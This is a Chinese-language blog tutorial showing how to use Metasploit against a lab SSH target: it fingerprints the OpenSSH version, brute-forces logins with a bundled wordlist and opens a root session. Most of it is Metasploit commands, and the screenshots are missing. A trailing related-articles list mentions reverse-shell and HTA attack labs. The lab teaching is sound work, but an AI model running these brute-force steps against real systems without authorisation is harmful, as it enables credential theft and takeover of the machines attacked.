2022-渗透测试-信息收集-Metasploit(基于SSH协议)

简介: 2022-渗透测试-信息收集-Metasploit(基于SSH协议)

 目录

 

1.查看SSH服务的版本信息

2.对ssh进行暴力破解

1.查看SSH服务的版本信息

打开kali系统的Metasploit软件。

image.gif编辑

search version

image.gif编辑

2.use auxiliary/scanner/ssh/ssh_version

image.gif编辑

3.show options

image.gif编辑 4.set RHOSTS 192.168.0.112  设置目标主机-靶机

image.gif编辑

5.run

image.gif编辑

版本是:SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1

2.对ssh进行暴力破解

1.search ssh_login

image.gif编辑

2.使用模块use auxiliary/scanner/ssh/ssh_login

image.gif编辑

3.查看需要配置的参数show options

image.gif编辑

4.设置目标主机 set RHOSTS 192.168.0.112

image.gif编辑

5.设置字典

set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt

这个字典是kali自带的,后面我们可以自己下载一个更强大的字典导入到kali里面。

image.gif编辑

6.将破解的详细信息打印出来 set VERBOSE true

image.gif编辑

7.run

image.gif编辑

8.creds 列出所有数据库中的凭据,也就是账号和密码

image.gif编辑

9.sessions 查看会话

image.gif编辑

10. 进入会话 sessions -i 1

此时,我们是以root用户进来的。

image.gif编辑

相关文章
|
12天前
|
Linux Shell 网络安全
Kali Linux系统Metasploit框架利用 HTA 文件进行渗透测试实验
本指南介绍如何利用 HTA 文件和 Metasploit 框架进行渗透测试。通过创建反向 shell、生成 HTA 文件、设置 HTTP 服务器和发送文件,最终实现对目标系统的控制。适用于教育目的,需合法授权。
46 9
Kali Linux系统Metasploit框架利用 HTA 文件进行渗透测试实验
|
18天前
|
安全 Ubuntu Linux
Metasploit Pro 4.22.6-2024111901 (Linux, Windows) - 专业渗透测试框架
Metasploit Pro 4.22.6-2024111901 (Linux, Windows) - 专业渗透测试框架
38 9
Metasploit Pro 4.22.6-2024111901 (Linux, Windows) - 专业渗透测试框架
|
2月前
|
存储 数据采集 分布式计算
Hadoop-17 Flume 介绍与环境配置 实机云服务器测试 分布式日志信息收集 海量数据 实时采集引擎 Source Channel Sink 串行复制负载均衡
Hadoop-17 Flume 介绍与环境配置 实机云服务器测试 分布式日志信息收集 海量数据 实时采集引擎 Source Channel Sink 串行复制负载均衡
57 1
|
2月前
|
安全 Linux Shell
Kali渗透测试:使用Metasploit对Web应用的攻击
Kali渗透测试:使用Metasploit对Web应用的攻击
157 4
|
3月前
|
移动开发 JSON Java
Jmeter实现WebSocket协议的接口测试方法
WebSocket协议是HTML5的一种新协议,实现了浏览器与服务器之间的全双工通信。通过简单的握手动作,双方可直接传输数据。其优势包括极小的头部开销和服务器推送功能。使用JMeter进行WebSocket接口和性能测试时,需安装特定插件并配置相关参数,如服务器地址、端口号等,还可通过CSV文件实现参数化,以满足不同测试需求。
268 7
Jmeter实现WebSocket协议的接口测试方法
|
2月前
|
安全 网络安全 Windows
Kali渗透测试:Metasploit 6.0 中的Evasion模块 原创
Kali渗透测试:Metasploit 6.0 中的Evasion模块 原创
57 0
|
2月前
|
安全 网络安全 数据库
Kali渗透测试:使用工具Metasploit攻击操作系统(一)
Kali渗透测试:使用工具Metasploit攻击操作系统(一)
241 0
|
2月前
|
安全 Linux 网络安全
Kali渗透测试:使用工具Metasploit攻击操作系统(二)
Kali渗透测试:使用工具Metasploit攻击操作系统(二)
314 0
|
2月前
|
缓存 网络协议 Linux
Python渗透测试之ARP毒化和协议应用
Python渗透测试之ARP毒化和协议应用
38 0
|
5月前
|
开发框架 前端开发 JavaScript
ABP框架测试信息---Winform端、动态网站、Vue&Element管理后端等
ABP框架测试信息---Winform端、动态网站、Vue&Element管理后端等